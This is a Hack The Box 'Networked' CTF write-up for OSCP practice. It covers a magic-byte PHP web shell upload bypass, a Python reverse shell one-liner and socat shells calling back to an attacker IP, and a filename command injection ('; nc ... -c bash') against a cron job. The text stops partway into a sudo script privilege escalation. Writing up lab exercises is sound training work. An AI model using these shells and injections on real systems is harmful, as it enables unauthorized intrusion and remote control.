Hack The Box — Networked— without Metasploit (TJNull’s list for OSCP)

8 min readMay 22, 2023

This is my 15th write-up for Networked, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

Enumeration and Scanning (Information Gathering).
Initial Foothold.
Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.

nmap -p- 10.129.182.37 --max-retries=2

So, port 80 and 22 are open. Let’s run a detailed scan on these ports.

nmap -sC -sV -T4 -A -p22,80 10.129.182.37

This doesn’t reveal much, except for versions of apache and openssh.

Let’s see what we have on the web server.

Just a note. Let’s see the source.

Let’s run gobuster on it.

gobuster dir -u http://10.129.182.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k --no-error

In a short while we got, upload.php and /backup.

Let’s navigate to upload.php first and see what do we have there.

We have a file upload page. This could be used to upload php shell.

Let’s try to upload a php shell.

It says ‘Invalid image file.’ That indicates, that it’s intended to upload images only.

Let’s see what we have in the /backup.

A tar package. This could be interesting. Let’s download it and extract it.

We have the code for upload.php here. Also we have a new file that we didn’t know of, photos.php.

Initial foothold

Let’s see what do we have in upload.php

Here, we can see that the code is checking for file type and file size. Let’s see what we have in check_file_type function. There’s no file type function defined here. By checking other files we see a check_file_type function in lib.php.

We can see that it’s checking the mime_type of the file. We can change that by simply adding ‘GIF8;’ at the start of our php shell.

Let’s try to upload the file.

It’s still not uploading. But, the font of the error message changed from the last error, indicating that this error got triggered based on some other reason. Let’s see the upload.php again.

It seems like it’s also checking the file extension in the end of the file name.

Let’s modify that and rename our shell from shell.php to shell.php.jpg and then upload it.

It’s uploaded successfully.

Let’s check the /uploads directory.

There’s nothing here. Just a full-stop mocking at us!

Let’s try the photos.php, because it sounds like a gallery.

And we have CentOS png files with our uploaded php.jpg file. There’s no display image for that file, since it doesn’t have any image. We can right click and ‘open image in new tab’ to navigate to this file.

We can see the GIF8; that we added in the file. Let’s give this script a cmd parameter from the url.

http://10.129.182.37/uploads/10_10_14_64.php.jpg?cmd=whoami

Shell is giving the output. Let’s get a reverse shell.

I would prefer python shell if python is installed, because it usually gives more stable shell

http://10.129.182.37/uploads/10_10_14_64.php.jpg?cmd=which+python

Python is installed in /usr/bin/python

Let’s start a socat listener on port 4242 on our attacking machine.

nc -lvnp 4242

Let’s get a shell by giving the the socat command to our webshell.

http://10.129.182.37/uploads/10_10_14_64.php.jpg?cmd=python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.64",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

And we got a shell! Let’s upgrade it to full tty.

It looks like socat is already installed on the target, that can make the job real easy.

Let’s start a socat listener on a different terminal session on port 4243.

socat file:`tty`,raw,echo=0 TCP-L:4243

Let’s initiate a shell from the target now.

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.64:4243

Let’s see if our listener grabbed it.

And it did!

Privilege Escalation

First, let’s see how many users are there on the target.

cat /etc/passwd

Along with root, there’s another user named guly.

Let’s see if we can access the home directory of that user.

cd /home/guly

We have a user.txt file having the flag, but only guly can read it. We also have a crontab.guly file, and we can read that file judging from the file permissions -rw-r — r —

Seems like a cron job that runs after every 3 minutes and executes check_attack.php

We have check_attack.php as well in this home directory, and judging the by the permissions, we can read it.

It looks like that we have a command injection vulnerability here.

The code above first creates a variable $path and set it to /var/www/html/uploads then run a scandir function on that path. scandir actually lists all the files and directories like (ls or dir). Then it’s passing the path variable in an exec function along with variable $value. If we can write files in /var/www/html/upload directory, we can create a file with that starts and ends with a semi-colon, so that our filename injects the command in the code.

POC:

If we create a file with name as follows

; nc 10.10.14.64 1337 -c bash;

And start a listener on a new terminal session; when the cronjob run, it will run a scadir in uploads directory with our file in it with the name above. And when it will run the exec function having

rm -f ;<our filename having command>;$value

It should treat the file name as a command in the shell and execute it.

Let’s check it.

User apache has the write permission to this directory.

Let’s create a file using touch <malicious file name>

 touch '; nc 10.10.14.64 1338 -c bash'

Let’s wait for 3 minutes to capture the shell in our listener

And we are guly now.

Let’s again capture a socat shell to make it perfect tty. Let’s start the listener first.

Let’s check the listener.

And we are guly.

Getting root

Let’s see what commands we can run as sudo with guly.

We can run /usr/local/sbin/changename.sh as root with no password.

Let’s read the contents of that file first.

From first two lines it seems like it’s taking some inputs and writing them into /etc/sysconfig/network-scripts/ifcfg-guly.

Let’s run it, give it some inputs and check that file.

Now let’s read the file /etc/sysconfig/network-scripts/ifcfg-guly

The inputs I gave have been assigned to those variables.

If we read the code again we can see that it’s using read command to read the input and then use echo to assign the values to the variable and writing it in the file.